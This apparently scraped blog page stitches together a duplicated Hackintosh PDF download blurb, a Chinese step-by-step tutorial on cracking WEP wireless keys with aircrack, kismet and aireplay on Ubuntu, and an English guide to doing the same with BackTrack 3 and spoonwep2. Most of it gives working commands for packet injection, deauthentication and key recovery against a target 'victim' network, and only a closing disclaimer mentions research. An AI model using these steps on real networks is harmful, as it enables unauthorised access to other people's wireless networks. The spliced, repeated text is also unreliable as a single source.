经常会有同学头脑发热,想在自己的电脑上也装个 MAC OS X Leopard 来满足一下自己。虽然网上介绍 PC安装MAC OS X Leopard 的文章很多,但均不太完整,或介绍得不详细。X-Beta的一位读者收藏着有一份介绍PC电脑硬盘安装MAC OS X Leopard的PDF文档,说明很详细,图文并貌,拿出来跟大家分享一下……
解压密码:www.x-beta.cn
下载地址:下载1 | 下载2 | 下载3 | 来自X-Beta | 下载4 | 下载5
经常会有同学头脑发热,想在自己的电脑上也装个 MAC OS X Leopard 来满足一下自己。虽然网上介绍 PC安装MAC OS X Leopard 的文章很多,但均不太完整,或介绍得不详细。X-Beta的一位读者收藏着有一份介绍PC电脑硬盘安装MAC OS X Leopard的PDF文档,说明很详细,图文并貌,拿出来跟大家分享一下……
解压密码:www.x-beta.cn
下载地址:下载1 | 下载2 | 下载3 | 来自X-Beta | 下载4 | 下载5
看了这篇文章,任何人都可以安装和运行Linux,并破解WEP密钥。我一共花了整整两天,并阅读了大量资料才做出这个东西,现在拿出来和大家 分享。我不是Linux方面的专家。你所需要的就是一个有无线网卡的旧笔记本和一份Ubuntu Linux的拷贝,这是目前最流行并且最易于安装的Linux发行版本之一。
第一步,很显然,是安装Ubuntu。从CD启动,按指示操作,非常简单。要注意的是,接下来的每一步都要有序进行,否则就达不到预期目标。
下一步是安装其它程序。首先要保证你的本本可以联网。安装其它程序,需要打开一个终端窗口,并键入如下代码:
sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup sudo gedit /etc/apt/sources.list |
在编辑器中,用以下代码代替其它东西:
## Add comments (##) in front of any line to remove it from being checked. ## Use the following sources.list at your own risk. deb http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse deb-src http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse ## MAJOR BUG FIX UPDATES produced after the final release deb http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse deb-src http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse ## UBUNTU SECURITY UPDATES deb http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse deb-src http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse ## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.) deb http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse deb-src http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse ## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.) deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free deb-src http://packages.freecontrib.org/ubuntu/plf dapper free non-free |
保存文件、退出编辑器。敲入如下命令:
sudo apt-get update |
现在我们可以安装后续将会用到的包了:
sudo apt-get install build-essential sudo apt-get install aircrack sudo apt-get install kismet sudo apt-get install airsnort sudo apt-get install linux-source sudo apt-get install linux-headers sudo apt-get install sharutils |
接下来你应该更新整个系统,方法是,进入系统菜单——>Administration——>Update Manager。单击“Check”,开始安装更新。然后重启系统。完成后,为Madwifi驱动打补丁。
这个地方可能会有点复杂。我的无线网卡(Linksys WPC55AG)用的是Atheros驱动,我需要对之打补丁。如果你的驱动和我的不同,你需要研究一下是否需要为驱动打补丁,是否甚至可以和 Aircrack套件协同工作。Aircrack-ng.org的论坛是一个用来测试的好地方,当然了,google search也是的。如果你的网卡也是Atheros的,我们称之为ath0,那么,在终端窗口敲入iwconfig,会出现一行字符,显示以太网控制器 是Atheros Communications……
我们来打补丁。当发现硬盘旧的驱动时,会暂时让你的无线网卡无法工作。先进入/usr/src目录,下载新的驱动、删掉老驱动,然后安装新驱动,并打上补丁。你可以把以下代码拷贝粘贴到终端:
sudo -i cd /usr/src wget http://syserr.com/stuff/madwifi-cvs-20051025.tar.gz wget http://syserr.com/stuff/madwifi-cvs-20051025.patch ifconfig ath0 down rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal find /lib/modules -name ‘ath*’ -exec rm -v {} \; find /lib/modules -name ‘wlan*’ -exec rm -v {} \; tar zxvf madwifi-cvs-20051025.tar.gz cd madwifi patch -Np1 -i ../madwifi-cvs-20051025.patch make && make install modprobe ath_pci |
如果你用的是Atheros驱动,接下来我们旧需要配置kismet了。如果你用的是其它驱动,就必须看你所使用的语法。首先进入Kismet配置,然后改变源代码行。
sudo gedit /etc/kismet/kismet.conf |
把以“source=”打头的代码行变为“source=madwifi_ag,ath0,madwifi”,重启计算机。重启后你将可以通过无线网卡访问英特网。
现在我们开始破解。打开一个终端窗口,进入监控模式,运行ksimet。
sudo airmon start ath0 sudo kismet |
找到你想要破解的无线网络,需要注意其ESSID和通道,然后敲Ctrl-C退出。
接下来运行airodump。
sudo airodump ath0 filename channel# 1 |
文件名随你意,可以作为ivs文件存在你的home目录下,或者存在你运行命令的任何目录下。
从airodump中拷贝无线网络的bssid,具体做法是选中后敲Shift+Ctrl+C。打开一个新的终端窗口,以便我们可以运行 aireplay,开始注入数据包,导致数据量上升。我们想要airodump中的数据栏显示在10万到40万之间。数据包越多,aircrack就可以 越快地找到WEP密钥。如果WEP密钥是128位的,我们可能需要多达100万个数据包。
sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0 |
应该把网络和无线连接联系起来。如果总是超时,你需要离无线路由器更近,或通过“sudo iwconfig ath0 rate 1M”改变接口速率。
接下来我们想开始注入数据包。
sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0 |
起初只是读取数据包,并且报告0个ARP请求、发送0个数据包。只需要等一两分钟,就会开始大量发送数据包了。如果返回文本,并报告说已经被削弱了,那么敲Ctrl+C,重新运行命令。可以通过敲入下面这条命令来加速任何事情:
sudo aireplay -0 ath0 -a BSSID ath0 |
否则就只坐等事情慢慢进行吧。随着数据包开始被发送,Airodump中的数据栏就开始飙升。等到收到了预期数量的数据包,打开一个新的终端窗口,运行aircrack。
sudo aircrack filename.ivs |
一分钟后,aircrack应该返回WEP密钥。如果没有返回,那就继续回收更多的数据包。
这做起来一点都不费劲,但可以起作用。
Passwords generated by WEP is longer, safe and complicated enough? If you think so you are making a big mistake. With the system Linux BT3(Back Track 3), we could crack the possword in about 10 minutes. So, it is best to do some safety measures at once.
Below are the command line format, it is estimated that a lot of friends don’t understand, but leave for friends who need.If you can not wait, please pull down.
The command line to crack wireless passwords with Ubuntu:
http://security.ctocio.com.cn/tips/108/6477108.shtmlThe command line to crack wireless passwords with BT3:
http://www.hackbase.com/tech/2008-10-21/41998.htmlCrack wireless passwords with WinAirCrack under Windows XP:
http://security.ctocio.com.cn/tips/108/6477108.shtml
Two lists are separately tested with BT3 can be used to crack wireless passwords, please click to check yours, but it doesn’t matter if you can’t find yours in this 2 lists.
Notebook Models
http://backtrack.offensive-security.com/index.php/HCL:LaptopsNIC Models
http://backtrack.offensive-security.com/index.php/HCL:Wireless
The BT3, full name is Back Track 3, This is a linux portable system that can be put into a U disk or CD-ROM to start on the harddisk by itself, no need in the local installation, (by now have the BETA version of BT4, and friends can have a try).
Official Website
http://www.remote-exploit.org/BT3, BT4 download link
http://www.remote-exploit.org/backtrack_download.htmlHas ISO, U disk and Vmware virtual machine formats, everyone take what we need, here we chose U disk version (with whole comparison tools), why? Edid not see “xtended”?
With spoonwep2, users can more easily carry out the wireless network scan, capture or injection of capture, crack the password. No need to enter the MAC again, crack IV is automatic, no need to enter cumbersome command-line commands. Wonderful isn’t it?
spoonwep2 download link:
http://www.butian.org/security/software/protect/707.html
Format your U disk, unzip bt3final_usb.iso and put them into U disk, about 780MB with two directories BOOT and BT3. Put spoonwep2.lzm extracted to U disk under the directory / BT3/modules/
Open BOOT directory, run bootinst.bat
If you computer recognised U Disk as a “local disk” instead of “Removable Disk.” you should run bootinst.bat with parameter -f.
We finished boot disk. let’s insert the U disk, restart, the BIOS must be set up to U disk, enter the BT3 system.
Chose the first, You can see beautiful black BACK TRACK of the Linux desktop system.
As shown, in the menu bar click to start spoonwep2, or in the terminal window enter “spoonwep”, it can be activated.
Choose your wireless card model, driver selected as normal, because of the attack side, we do not know the number of WEP password on the other side, so choose unknown victim. After selecting, click the next button.
Enter the “Victims Discovery”. Point the LAUNCH on your right, the system is scanning surrounding wireless networks.
After searching signal is completed, we will see some wireless networks, Select on and we can see this AP client, select one with many DATA, (We are based on an analysis of data packets to crack the password, so the more packets, crack faster).
After the selection, as shown, we have four kinds of attacks, two kinds of analytical data modes (64 or 128), chose the right things then click on LANCH.
The graph below at the right bottom corner is a successful example, the red code is the WEP password.
Warning: This tutorial is only for research & study
via Forece